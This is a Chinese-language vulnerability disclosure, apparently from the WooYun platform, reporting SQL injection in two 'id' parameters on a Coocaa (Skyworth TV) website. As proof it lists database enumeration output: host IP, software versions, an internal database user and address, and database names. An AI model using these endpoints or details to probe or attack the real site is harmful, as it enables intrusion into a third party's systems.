漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-06-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
闲来无视,家里去年买了台创维酷开的电视,尼玛十分坑爹啊。
于是决定去官网逛逛衍生了下面发生的事情。
详细说明:
注入:http://haolaiwu.coocaa.com/self/city.php?id=
http://haolaiwu.coocaa.com/self/distinct.php?id=
Host IP: 113.108.232.236
Web Server: nginx/1.1.9
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 92 ms
Current DB: coocaa_web_new
Current User: web@192.168.0.52
Sql Version: 5.1.69-log
Host Name: mysql
System User: web@192.168.0.52
Compile OS: redhat-linux-gnu
Installation dir: /usr/
DB User: 'web'@'192.168.0.52'
Data Bases: information_schema
coocaa_web_new
test
漏洞证明:
Host IP: 113.108.232.236
Web Server: nginx/1.1.9
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 92 ms
Current DB: coocaa_web_new
Current User: web@192.168.0.52
Sql Version: 5.1.69-log
Host Name: mysql
System User: web@192.168.0.52
Compile OS: redhat-linux-gnu
Installation dir: /usr/
DB User: 'web'@'192.168.0.52'
Data Bases: information_schema
coocaa_web_new
test
修复方案:
你们的程序猿比我更专业。
版权声明:转载请注明来源 枫叶哥@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝